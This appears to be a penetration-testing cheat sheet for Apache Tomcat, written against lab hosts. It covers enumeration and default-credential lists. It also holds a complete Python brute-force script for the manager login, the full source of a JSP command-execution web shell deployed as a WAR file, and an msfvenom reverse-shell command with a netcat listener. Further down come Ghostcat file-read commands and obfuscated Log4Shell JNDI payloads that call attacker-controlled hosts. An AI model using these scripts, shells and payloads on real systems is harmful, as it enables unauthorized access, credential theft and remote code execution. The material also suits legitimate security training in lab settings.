Tomcat (8080)

Discovery

http://app-dev.inlanefreight.local:8080/invalid

$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat 

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author" 

<SNIP>

Interesting Files

WEB-INF/web.xml

tomcat-users.xml

 <SNIP>
  
!-- user manager can access only manager section -->
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />

<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />


</tomcat-users>

Enumeration

gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 

ROOT
add
admin
admin-console
balancer
dav
deploy
docs
examples
examples/jsp/index.html
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp
examples/servlet/HelloWorldExample
examples/servlet/SnoopServlet
examples/servlet/TroubleShooter
examples/servlet/default/jsp/snp/snoop.jsp
examples/servlet/default/jsp/source.jsp
examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop
examples/servlets/index.html
examples/websocket/index.xhtml
host-manager
host-manager/add
host-manager/host-manager.xml
host-manager/html
host-manager/html/*
host-manager/list
host-manager/remove
host-manager/start
host-manager/stop
html/*
install
invoker/JMXInvokerServlet
j4p
jmx-console
jmx-console/HtmlAdaptor
jmxproxy/*
jsp-examples
list
manager
manager/deploy
manager/html
manager/html/*
manager/install
manager/jmxproxy
manager/jmxproxy/*
manager/list
manager/manager.xml
manager/reload
manager/remove
manager/resources
manager/roles
manager/save
manager/serverinfo
manager/sessions
manager/start
manager/status.xsd
manager/status/*
manager/stop
manager/undeploy
reload
remove
resources
roles
save
server-manager/html
serverinfo
servlet/default/
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.HTMLManagerServlet
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.ManagerServlet
servlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.WebdavServlet/
servlets-examples
sessions
start
status
status/*
stop
tomcat-docs
tomcat/manager/html
undeploy
web-console
web-console/Invoker
webdav
webdav/index.html
webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
webdav/servlet/webdav/

Wordlists

wordlists/technologies/tomcat.txt at main · trickest/wordlistsGitHub

wordlists/technologies/tomcat-all-levels.txt at main · trickest/wordlistsGitHub

Password

Default-Credentials/Apache-Tomcat-Default-Passwords.mdown at master · netbiosX/Default-CredentialsGitHub

tomcat::Tomcatadm

osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product                          |  username  |  password  |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) |   admin    |   admin    |
| apache tomcat host manager (web) |   ADMIN    |   ADMIN    |
| apache tomcat host manager (web) |   admin    |  <blank>   |
| apache tomcat host manager (web) |   admin    |   j5Brn9   |
| apache tomcat host manager (web) |   admin    |   tomcat   |
| apache tomcat host manager (web) |   cxsdk    |   kdsxc    |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) |  ovwebusr  | OvW*busr1  |
| apache tomcat host manager (web) |    QCC     |  QLogic66  |
| apache tomcat host manager (web) |   role1    |   role1    |
| apache tomcat host manager (web) |   role1    |   tomcat   |
| apache tomcat host manager (web) |    role    | changethis |
| apache tomcat host manager (web) |    root    |    root    |
| apache tomcat host manager (web) |   tomcat   | changethis |
| apache tomcat host manager (web) |   tomcat   |   s3cret   |
| apache tomcat host manager (web) |   tomcat   |   tomcat   |
| apache tomcat host manager (web) |   xampp    |   xampp    |
+----------------------------------+------------+------------

cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt 

j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin 
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat 
tomcat admin
tomcat changethis

Tomcat Manager - Login Brute Force

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58

mgr_brute.py

#!/usr/bin/python

import requests
from termcolor import cprint
import argparse

parser = argparse.ArgumentParser(description = "Tomcat manager or host-manager credential bruteforcing")

parser.add_argument("-U", "--url", type = str, required = True, help = "URL to tomcat page")
parser.add_argument("-P", "--path", type = str, required = True, help = "manager or host-manager URI")
parser.add_argument("-u", "--usernames", type = str, required = True, help = "Users File")
parser.add_argument("-p", "--passwords", type = str, required = True, help = "Passwords Files")

args = parser.parse_args()

url = args.url
uri = args.path
users_file = args.usernames
passwords_file = args.passwords

new_url = url + uri
f_users = open(users_file, "rb")
f_pass = open(passwords_file, "rb")
usernames = [x.strip() for x in f_users]
passwords = [x.strip() for x in f_pass]

cprint("\n[+] Atacking.....", "red", attrs = ['bold'])

for u in usernames:
    for p in passwords:
        r = requests.get(new_url,auth = (u, p))

        if r.status_code == 200:
            cprint("\n[+] Success!!", "green", attrs = ['bold'])
            cprint("[+] Username : {}\n[+] Password : {}".format(u,p), "green", attrs = ['bold'])
            break
    if r.status_code == 200:
        break

if r.status_code != 200:
    cprint("\n[+] Failed!!", "red", attrs = ['bold'])
    cprint("[+] Could not Find the creds :( ", "red", attrs = ['bold'])
#print r.status_code

$ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

[+] Atacking.....

[+] Success!!
[+] Username : b'tomcat'
[+] Password : b'admin'

Tomcat Manager - WAR File Upload

GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers.GitHub

Tomcat Penetration Testing - Hacking ArticlesHacking Articles

Manually

jsp shell: https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp 

  adding: cmd.jsp (deflated 81%)

Browse to select the .war file and then click on Deploy.

$ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

</pre>
</BODY></HTML>

Msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

nc -lnvp 4443

listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224


id

uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

Metasploit

multi/http/tomcat_mgr_upload

Exploitation

Web Shell

CVE-2024-50379 - RCE

Time-of-Check Time-of-Use (TOCTOU) race condition that can lead to remote code execution (RCE) if the server's configuration allows writable directories.

Upload a JSP shell to a vulnerable server and execute commands remotely.

GitHub - Alchemist3dot14/CVE-2024-50379: CVE-2024-50379 is a critical vulnerability affecting multiple versions of Apache Tomcat, an open source web server and servlet container widely used for deploying Java-based web applications. The vulnerability arises from a Time-of-Use (TOCTOU) race condition that occurs when compiling JavaServer Pages (JSPs).GitHub

GitHub - pwnosec/CVE-2024-50379: ExploitDB CVE-2024-50379 a vulnerability that enables attackers to upload a JSP shell to a vulnerable server and execute commands remotely. The exploit is especially effective when the /uploads directory is either unprotected or missing on the target server.GitHub

GitHub - v3153/CVE-2024-50379-POCGitHub

GitHub - ph0ebus/Tomcat-CVE-2024-50379-Poc: RCE through a race condition in Apache TomcatGitHub

CVE-2024-52316 - Authentification Bypass

Version Series	Affected Versions
Apache Tomcat 11.0	Versions prior to 11.0.0
Apache Tomcat 10.1	Versions prior to 10.1.31
Apache Tomcat 9.0	Versions prior to 9.0.96

GitHub - TAM-K592/CVE-2024-52316: CVE-2024-52316 - Apache Tomcat Authentication Bypass VulnerabilityGitHub

CVE-2024-40725 and CVE-2024-40898 - SSRF

Apache HTTP Server versions 2.4.0 through 2.4.61

GitHub - TAM-K592/CVE-2024-40725-CVE-2024-40898: CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.GitHub

CVE-2024-52318 - XSS

Apache Tomcat 11.0 Versions prior to 11.0.1 Apache Tomcat 10.1 Versions prior to 10.1.33 Apache Tomcat 9.0 Versions prior to 9.0.97

GitHub - TAM-K592/CVE-2024-52318: CVE-2024-52318 - Apache Tomcat XSS Vulnerability in Generated JSPsGitHub

CVE-2024-52317 - Data Leakage

Apache Tomcat 11.0 Versions prior to 11.0.0 Apache Tomcat 10.1 Versions prior to 10.1.31 Apache Tomcat 9.0 Versions prior to 9.0.96

GitHub - TAM-K592/CVE-2024-52317: CVE-2024-52317 - Apache Tomcat HTTP/2 Data Leakage VulnerabilityGitHub

Ghostcat

https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat/blob/main/CVE-2020-1938.md

nmap -sV -p 8009,8080 app-dev.inlanefreight.local

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 9.0.30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds

The exploit can only read files and folders within the web apps folder, which means that files like /etc/passwd can’t be accessed.

GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajp协议文件读取漏洞GitHub

python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml

python3 exploit:

GitHub - 00theway/Ghostcat-CNVD-2020-10487: Ghostcat read file/code execute,CNVD-2020-10487(CVE-2020-1938)GitHub

Log4Shell

GitHub - fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228GitHub

${jndi:ldap://xxxxx.burpcollaborator.net/a}

${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload 

# ":-" notation
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}

# Unicode characters
${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}

# "::-" notation
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}

Spring4Shell

GitHub - BobTheShoplifter/Spring4Shell-POC: Spring4Shell Proof Of Concept/Information CVE-2022-22965GitHub

Tomcat CGI

Tomcat CGI

Tools

GitHub - p0dalirius/ApacheTomcatScanner: A python script to scan for Apache Tomcat server vulnerabilities.GitHub

Resources

HTB: Jerry0xdf hacks stuff

Apache Tomcat Pentesting | Exploit Noteshideckies

TomcatHackTricks